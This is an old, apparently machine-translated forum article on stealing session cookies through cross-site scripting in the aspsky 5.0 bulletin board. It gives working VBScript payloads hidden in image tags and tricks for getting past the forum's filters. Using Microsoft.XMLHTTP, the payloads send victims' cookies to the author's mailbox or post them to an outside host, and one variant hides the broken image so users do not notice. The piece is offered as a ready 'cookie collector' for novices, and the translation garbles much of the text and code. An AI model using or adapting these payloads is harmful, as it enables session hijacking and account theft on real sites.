Use the Microsoft. XMLHTTP Control to send cookies

Author: czy <czy82@elong.com>
Source: http://www.nsfocus.net
Date: 2003-09-03

(Note thatArticleSo it is best
Http://www.chinansl.com/czy/xmlhttp.txtread the article
Http://www.chinansl.com/czy/aspsky5.htmtestCode)

You may already be familiar with cross-site scripting attacks, but there is always
Problem: Always Use window. Open to play a form and then send the cookie. This is a secret.
This is a big discount. I used to think about how to use the insertadjacenthtml method to inject HTML statements on the webpage.
The method barely allows sending the cookie without the IE window, but sometimes the IE error occurs in actual use.

Is there any better way? A Microsoft. XMLHTTP
Control (this control is a default built-in control of Win98/2 K, and it is considered safe by IE !), Through it we
You can send an HTTP request to a website on a webpage, either post or get.

The idea has come here. Let's take a look at it. I will use aspsky 5.0 0320 as an example.
We know that you can write VBScript in SRC: such a statement .. For example
but we can only execute one statement, such
this will all be wrong!
What should I do? In vbs, we can use the execute statement. In JS, we can use the eval language!
For example:
Or

Not Dizzy yet, right? You may notice that when using the execute Statement of vbs, the double quotation marks must be replaced with "This is because:
In vbs, single quotes must enclose strings. They must be two single quotes that represent one quotation mark and are enclosed in double quotes!
Therefore, in the execute statement, we cannot use single quotation marks, but directly use ". When HTML matches the quotation marks
It will match the quotation marks after src = ", so we can only use" instead.

The problem of quotation marks is solved. In actual application, aspsky will also process our code:
1: If a script string is found, a space is added to the front.
2: If an HTTP string is found to be a URL, add the <A> element on both sides.
3: If space is found, it will be replaced

Solution:
1: VBScript is replaced by VBScript
2: replace HTTP with HT + TP... (more than one pair of APP in quotation marks in vbs, and + represents a connector)
3: Use spaces instead (Note No)

The last question is about sending cookies:
1: The control can get or post any website locally, but only
Get, post the current server .... Otherwise, ie will reject the questions!
2: The cookie cannot contain & and other characters with special comments in the URL.

Solution:

1: it can only be sent to the current server, so you can send the cookie to your registered user's mailbox on the Forum :)
2: replace (document. Cookie, &,-), used in vbs
Replace is used. In this example, I Replace "&" "-"

The problem is solved as follows:
The aspsky 5.0 0320 test is successful.

//----------------------

[Img] vbsrept: Execute (DAT = Replace (document. cookie, &,-): sethttp = Createobject (Microsoft. XMLHTTP): HTTP. openget, HT + TP: // www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp? Action = Send & touser = czy & Title = News & submit = Send & message = & dat, false: http. Send) [/img]

Note: Send the cookie to the czy user and the mail title is "news ".
//----------------------

In addition, the normal usage of the control is as follows:
<Script language = vbs>
Dat = Document. Cookie
Set HTTP = Createobject ("Microsoft. XMLHTTP ")
HTTP. Open "Post", "http://www.chinansl.com/czy/get.asp? Cook = "& dat, false
HTTP. Send
Tt = http. responsetext
Msgbox TT
</SCRIPT>

Make the code more perfect. Now the cookie is in our mailbox, but there is a small problem because the image is not
If the image is displayed normally, it will be a cross, and there will be a prompt to browse the image in the new window... This will inevitably make people
Suspicious.

Solution:
All IMG elements in a webpage can be illustrated by document. imanges and their size can be set. When width is 0
It is equivalent to hidden. You can determine whether the src attribute value of the element contains "ript" to see if it is our image.
The value greater than the identifier is replaced by 0!

Code:
[Img] vbsrept: Execute (foreachaaindocument. Images: ifinstr (AA. SRC, ript) then: AA. width = 0: endif: Next) [/img]

Actual application code:
[Img] vbsrept: Execute (foreachaaindocument. images: ifinstr (AA. SRC, ript) then: AA. width = 0: endif: Next: DAT = Replace (document. cookie, &,-): sethttp = Createobject (Microsoft. XMLHTTP): HTTP. openget, HT + TP: // www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp? Action = Send & touser = czy & Title = alll & submit = Send & message = & dat, false: http. Send) [/img]

// ------------------- Convenient for cainiao :)Aspsky 5.0 0320 cooki collector -- czy </P> <p>